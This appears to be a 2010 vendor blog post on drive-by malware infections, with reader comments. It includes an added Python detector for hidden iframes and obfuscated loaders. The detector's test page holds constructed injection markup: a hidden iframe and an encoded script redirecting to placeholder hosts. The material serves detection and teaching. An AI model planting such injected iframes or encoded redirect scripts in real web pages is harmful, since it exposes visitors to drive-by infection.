
Drive-by malware—just when you thought it was safe to surf the Internet

By Will Gragido CISSP CISA NSA-IAM / IEM, Digital Vaccine Labs, HP TippingPoint 

 

Season’s Greetings and Warnings…

Happy Holidays! In this season, we are often reminded to give thanks for what we have in the form of friends, family and opportunity while wishing good tidings to those near and far. We're encouraged to celebrate and share our good cheer with the masses and our money with the retailers. It's a huge time of year for retailers, online or otherwise, as it dictates much of what they might expect from the coming calendar year in terms of business profit and revenue.

Unfortunately, this also makes it an incredibly popular time of year for advanced malicious code and content infections to spread to the unsuspecting masses, wreaking havoc and chaos in homes and businesses the world over.

 

At this point you may be asking: Why in 2010 should surfing the Internet with legitimate intent—as opposed to doing so with questionable intent—pose such great risk? It’s a reasonable question to ask, especially given how common rudimentary security solutions are on computing platforms today.  Yet regardless of the ubiquitous nature of security solutions on computing platforms, great risk still exists.

 


 

 

How the Hackers stole Christmas

As we've discussed in previous posts, the concept of malicious code and content is an elusive one, despite the steady stream of material promoted through media channels, whether online, in print or on television. Establishing the who, what, where, when, why or how is not trivial.

 

Few threats demonstrate this as accurately as the drive-by malware infection. Drive-by malware, or drive-by downloads, are essentially unintentional downloads of software (typically malicious and untrusted) from a site on the Internet. Though it's easy to believe that the sites in question are malicious, the fact is that in most cases the sites are not malicious themselves but have been compromised.

Typically these downloads fall into one of the following categories:

1.     Simple web surfing & email communication

  • Surfing onto a compromised website which contains malicious code & content
  • Reading a compromised email or email attachment which executes an infection
  • Dismissing a pop-up that in fact triggers a download

2.     Uninformed authorization

  • The user authorizes the installation of a piece of code without fully understanding the consequences of his or her actions
  • Example: The user surfs onto a site and a download-and-installation request for an application appears (an ActiveX control, a Java applet or some other application). Authorization is granted and, as a result, infection occurs and the system is compromised through obfuscation and redirection. (In cases such as these there is often a "fee" for removal of a given piece of code, provided the user's system protection is incapable of removing it, did not detect it as a threat, or was bypassed by the user's own authorization.)
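The compromised-site case above rarely announces itself: the injected content is usually a hidden iframe or a self-decoding script that redirects the browser to a second host, which is the "obfuscation and redirection" mentioned in the example. The following is an added illustration, not code from this post or from HP TippingPoint, of how an analyst can pull those tells out of a fetched page. The sample page, the hostnames in it and the helper names are all constructed for the example.

```python
"""Flag common drive-by download tells in a fetched HTML page: hidden
iframes and obfuscated, self-decoding scripts that write a redirect.
Illustrative example only; the page below is constructed and every
hostname in it is a placeholder (not HP TippingPoint code)."""
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed sample: a legitimate-looking page with an injected
# zero-size iframe and an injected script that unescapes and writes
# a second, one-pixel iframe pointing at another host.
SAMPLE_PAGE = """<html><head><title>Holiday Sale</title></head><body>
<h1>Season's greetings</h1>
<iframe src="http://bad.example/load.php" width="0" height="0" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fexploit.example%2Fin.cgi%3F3%22%20width%3D1%20height%3D1%3E%3C%2Fiframe%3E'));</script>
<p>Thanks for shopping with us.</p>
</body></html>"""

# Calls that legitimate inline scripts rarely need but injected,
# packed loaders almost always use.
OBFUSCATION = re.compile(r"\b(eval|unescape|document\.write|String\.fromCharCode)\s*\(")


class _Collector(HTMLParser):
    """Gather iframe attributes and raw inline script bodies."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def _is_hidden(attrs):
    """True for the classic injection shape: 0/1 px box or CSS-hidden."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    tiny = all((attrs.get(d) or "").strip().rstrip("px") in ("0", "1")
               for d in ("width", "height"))
    return tiny or "display:none" in style or "visibility:hidden" in style


def _decode_unescape(script):
    """Decode every unescape('...') argument so the injected markup can be
    read instead of the %XX soup it was hidden in."""
    return [unquote(m.group(1))
            for m in re.finditer(r"unescape\(\s*'([^']*)'\s*\)", script)]


def analyze(html):
    """Return (finding, target_url) pairs for the page."""
    c = _Collector()
    c.feed(html)
    findings = []
    for a in c.iframes:
        if _is_hidden(a):
            findings.append(("hidden_iframe", a.get("src") or ""))
    for s in c.scripts:
        if OBFUSCATION.search(s):
            # The decoded payload usually carries the real redirect target.
            srcs = re.findall(r'src="([^"]+)"', " ".join(_decode_unescape(s)))
            findings.append(("obfuscated_script", srcs[0] if srcs else ""))
    return findings


if __name__ == "__main__":
    for kind, target in analyze(SAMPLE_PAGE):
        print(f"{kind:18} -> {target}")
```

The point of decoding rather than just flagging is that the decoded iframe src is what you block at the gateway and search for across other hosts; the obfuscated string itself changes from infection to infection.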

 

Be cautious...and be of good cheer

The implications of such compromises range greatly. The net effect of such activity can be, and often is, extremely serious, manifesting in various forms of personal, professional, financial and geo-political compromise. As a result, users should take every possible precaution at their disposal, from the technological to the theoretical, to minimize the risks and maximize the holiday cheer.

 

‘Tis the season to learn more  

Leverage the power of the Instant-On Enterprise to protect and defend your business. Learn how Enterprise Security becomes your infrastructure guardian, protecting you from suspicious emails, malicious attacks and zero-day vulnerability exploits.

 

For more information on drive-by malware downloads and infections, please refer to the following:

 

Comments
Hector A Arevalo(anon) | ‎12-06-2010 05:56 PM

Great article! And thanks for sharing those useful resources!

HPNetworking | ‎12-06-2010 11:40 PM

TxU Hector....glad you found this post useful....

John Pirc(anon) | ‎01-07-2011 01:01 PM

Great article Will!  Looking forward to the next one!
